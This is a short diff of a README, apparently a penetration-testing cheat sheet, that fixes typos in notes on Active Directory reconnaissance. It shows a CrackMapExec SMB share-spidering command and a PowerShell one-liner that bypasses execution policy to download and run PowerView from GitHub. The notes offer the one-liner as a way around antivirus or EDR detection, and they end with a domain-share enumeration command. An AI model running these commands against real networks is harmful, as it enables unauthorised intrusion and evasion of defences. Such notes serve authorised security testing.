aasphixie/aasphixie.github.io/README.md

 cme smb -u 'XXX' -p 'XXX' -M spider_plus IP_ADDRESS/MASK
 ```

-If CME is detect by AV/EDR, use PowerShell one-liner PowerView :
+If CME is detected by AV/EDR, use PowerShell one-liner PowerView :

 ```markdown
 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
 ```

-Then, a lot a of functionalities can be used.
+Then, a lot of functionalities can be used.
 To find all domain shares :

 ```markdown
 Find-DomainShare -CheckShareAccess